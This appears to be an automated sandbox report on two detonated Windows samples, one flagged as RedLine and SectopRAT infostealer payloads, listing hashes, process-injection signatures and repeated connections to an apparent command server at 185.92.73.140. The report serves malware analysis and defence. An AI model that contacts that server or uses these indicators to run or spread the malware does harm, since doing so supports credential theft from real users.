| SHA256 | f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88 |
| SHA512 | 108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 0dc0c432c76b5f23dec8f2da05da574f |
| SHA1 | f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0 |
| SHA256 | 9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee |
| SHA512 | 5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9 |
memory/3304-160-0x0000000000500000-0x0000000000506000-memory.dmp
memory/4880-162-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-163-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-164-0x0000013745870000-0x0000013745890000-memory.dmp
memory/4880-166-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-168-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-167-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-165-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-169-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-170-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-172-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-175-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4880-173-0x0000000140000000-0x0000000140786000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
146s
Max time network
148s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2496 set thread context of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | C:\Users\Admin\AppData\Local\Temp\Installer2.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
Network
| Country | Destination | Domain | Proto |
| NL | 185.92.73.140:80 | 185.92.73.140 | tcp |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp |
Files
memory/2496-0-0x00000000745EE000-0x00000000745EF000-memory.dmp
memory/2496-1-0x00000000013D0000-0x0000000001444000-memory.dmp
memory/2496-2-0x00000000745E0000-0x0000000074CCE000-memory.dmp
memory/2496-3-0x0000000000660000-0x0000000000682000-memory.dmp
memory/1588-4-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1588-9-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1588-6-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1588-10-0x00000000745E0000-0x0000000074CCE000-memory.dmp
memory/2496-11-0x00000000745E0000-0x0000000074CCE000-memory.dmp
memory/1588-12-0x00000000745E0000-0x0000000074CCE000-memory.dmp
memory/1588-13-0x00000000745E0000-0x0000000074CCE000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
143s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nixware crack.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\nixware crack.exe
"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |